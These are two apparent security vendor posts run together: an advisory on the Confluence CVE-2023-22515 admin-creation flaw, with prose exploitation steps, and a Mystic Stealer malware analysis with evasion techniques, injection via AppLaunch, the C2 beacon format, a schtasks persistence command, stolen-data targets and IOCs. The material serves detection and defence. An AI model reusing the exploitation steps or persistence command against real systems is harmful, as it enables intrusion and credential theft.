The overall CVSS score is 10. (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

The base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  •Attack vector is network.
  •Attack complexity is low.
  •Privileges required is none.
  •User interaction is none.
  •Scope is changed.
  •Impact of this vulnerability on data confidentiality is high.
  •Impact of this vulnerability on data integrity is high.
  •Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  •The exploit code maturity level of this vulnerability is proof of concept code.
  •The remediation level of this vulnerability is official fix.
  •The report confidence level of this vulnerability is confirmed.

Technical Overview

Atlassian Confluence Data Center is a self-managed edition of Confluence, built to support organizations’ size, complexity and governance needs.

To trigger the vulnerability, an unauthenticated attacker can modify the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a single request using the URI /server-info.action endpoint

Exploitation

CVE-2023-22515 can be exploited in a series of steps. The followings steps will demonstrate how RCE is obtained on Atlassian Crowd:

Before manipulating the parameters let us first observe a basic login request.

Next, we can trick the server into believing the configuration hasn’t been completed by setting “applicationConfig.setupComplete” to false.

Once the server believes setup is complete, we can use the setupadministrator.action to try and create an administrative level account passing the desired username and password.

As a result of the last request, a new account is created by the attacker that will allow a successful login to attempt with the attacker’s credentials.

 

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:
  • IPS:15926 – Confluence Data Center and Server Privilege Escalation
  • IPS:19383 – Confluence Data Center and Server Privilege Escalation 2
  • IPS:19382 – Confluence Data Center and Server Privilege Escalation 3

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph below indicate an increasing number of exploitation attempts over the last 40 days:

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade Confluence Data Center and Data Servers to version 8.3.3 or later, 8.4.3 or later, or 8.5.2 or later.

If that’s not possible, users can mitigate the issue by blocking access to the /setup/* endpoints on Confluence instances. Further steps to mitigate are dictated on an official link.

Relevant Links

Mystic Stealer Uses Trickery To Steal Data

This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection and hamper analysis, and is coded to steal a variety of information (including Steam credentials). Mystic uses geolocation, installed languages, and local time to ensure the malware is on a viable victim system.

Static Analysis

The main sample (md5:b8afb88f471cf88b67db6a39ff4053e3) has several points to note. In Figure 1, there is no packer or protector listed in the initial detection; however, the creation timestamp is very recent. There are two atypical sections listed: .inter and .00cfg (Figure 2). There is also a unique .pdb file referenced in Figure 3.

Figure 1: Initial sample detection

Figure 2: Abnormal PE file sections

Figure 3: Timestamp for the debugger is extremely recent

Looking at the file in a debugger, it is immediately apparent that this program was created to hamper analysis (Figure 4). Every single step immediately preceding the entry point is a jump to a function that will perform multiple checks against the system. These include:

  • Location: GetLocaleInfoW, IsValidLocaleName, GetUserDefaultLCID, LCIDToLocaleName, GetSystemTimeAsFileTime, EnumSystemsLocaleW
  • Virtual Machine/Debugger: IsProcesserFeaturePresent, IsDebuggerPresent,OutputDebugString, QueryPerformanceCounter, QueryPerformanceFrequency, GetProcessHeap, GetCurrentProcessId, GetCurrentThreadId

Figure 4: Obfuscation by jump instructions

Within many functions, ‘call-push-ret’ is being used as a way of indirectly using system API calls (Figure 5). Once the locale check has been cleared, only debug and VM checks are performed intermittently.

Figure 5: A known method of obfuscation is using ‘call-push-ret’

The program is also capable of setting its own sleep and wake conditions as shown in Figure 6, further enabling the malware to evade system defenses.

Figure 6: Dynamic sleep conditions and virtual machine checks

Dynamic Analysis

Running the sample without any patching results in an immediate error and the program terminates. The first round of checks to bypass are location and debugging protections, followed by intermittent virtual machine checks. At this point, the file will access the ‘.inter’ section at memory location 0xD80000. Manually running the next function will create a new PE file in the newly available space, as seen below in Figure 7.

Figure 7: A new executable is written to the ‘.inter’ section

Once this new program has been written, the command to run ‘AppLaunch’ is written to memory and executed (Figure 8). AppLaunch is a .NET application that is used by the malware for process injection.

Figure 8: The command ‘C:\Windows\Microsoft .NET\Framework\v4.0.30319\AppLaunch.exe’ is written immediately before launch

Once AppLaunch runs and the payload is injected, enumeration of the system will occur as well as an initial attempt to send data to the C2 server. Pulling strings from runtime memory of ‘AppLaunch’ shows that the injected payload is looking for analysis software.

Figure 9: Strings for known analysis tools IDA, Scylla, Immunity, x32/64dbg

A file is written to ‘~\AppData\Local\Temp’ as seen below in Figure 10. The name is hard-coded (4375vtb45tv8225nv4285n2.txt), and subsequent runs will create a file with the same name.

Figure 10: A file is written to ‘~\AppData\Local\Temp’ when malware is successfully run

The contents of the file show an IP address that is unsuccessfully contacted (Figure 11). This happens regardless of network connectivity, which means at the present time the IP is down or is not accepting communications. This IP is based out of Russia (Figure 12).

Figure 11: Log contents from written temp file


Figure 12: IP data

 

A packet capture shows what was sent to the malicious IP. The data is base64 encoded but contains basic information about the system. A partial capture is below in Figure 13.

Figure 13: The ASCII plaintext has a ‘hwid’ indicating the encoded system name

The full decoded message reads:

Sent system information
computername
SOFTWARE\Microsoft\Windows NT\CurrentVersion
UserName:
ScreenSize:
Current language:
Operation System:
Hardwares:
IP: {ip}
File Location:
Available KeyboardLayouts:
ProductName
SystemInformation.txt
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID

Extracting the injected payload from memory, it is another PE file that has no import or export table, no listed functions, and the debug timestamp is set in the future (Dec 3, 2023) as seen in Figure 14. There are a handful of plaintext strings that show some capabilities in Figure 14 but, given that the import table doesn’t (visibly) exist, it is difficult to determine exact functions.

Figure 14: The payload has no visible imports, exports, or functions. The debug timestamp is also from the future.

The listed strings show that the program can enumerate through files and running processes, but there are no file paths or application names found.

Figure 15: Visible strings give an idea of capabilities

In a debugger, the payload has functions to not only continuously check the system for analysis tools but will also terminate if any number of them fail (Figure 16). Each function also has the same set of of referenced items ‘LdrpInitializeProcess’ and ‘minkernel\\ntdll\\ldrinit.c’. After bypassing these evasion checks, several decoding functions were found.

Figure 16: Each green arrow represents a decision tree where the program can terminate

Using several methods to decode the data resulted in a complete dump of all commands. Figure 17 has a partial listing of what is enumerated by the malware, with a complete listing below.

Figure 17: Partial list of decoded commands

Dynamic imports (decoded):

  • Ole32.dll
  • User32.dll
  • Ntdll.dll
  • Gdi32.dll
  • Wininet.dll
  • Crypt32.dll
  • Gdiplus.dll
  • Shlwapi.dll
  • Kernel32.dll
  • Advapi32.dll
  • Rstrtmgr.dll

Data marked for extraction:

  • Chromium-based browsers
  • Chromium browser extensions
  • Chromium wallets
  • Gecko-based browser data
  • Gecko browser extensions
  • Web history
  • Saved credit card data
  • Autofill information
  • Cookies (chromium, mozilla)
  • Saved logins
  • Steam installation data
  • Telegram
  • Outlook (SMTP, POP, IMAP, HTTP credentials and addresses)
  • User tokens
  • Screenshots are taken during enumeration

Mystic creates persistence with a scheduled task using the command ‘/c schtasks /create /F /sc minute /mo 15 /tr “%ls” /tn “\WindowsAppPool\%ls”‘.

Mystic Stealer is highly evasive and can easily exfiltrate a large amount of data very quickly. These samples are detected by the following signatures: MysticStealer.Dropper, MysticStealer.Payload

IOCs

Main sample
md5: b8afb88f471cf88b67db6a39ff4053e3
sha1: 1c3c992f74a7905af067ef49657537e71be67413
sha256: 6ba71b02669ff6b6e939e334fd5b2aa907bfd3f54215c19df094be1cd5b948f8

Payload
md5: 4DF77A52DCE196CD2B3EE22A4E5A10B4
sha1: A9EB223D5A63592470723379CD975720895BEA47
sha256: BBDFF99D02941D59512389B4D6A43B0A23AF799A270204A6FF925BE550078A42

IP
hxxp://5.42.92[.]211/loghub/master

Mutex
\Sessions\1\BaseNamedObjects\Global\bbf55406-3d8f-4afd-a2ba-a73b2d5c73b4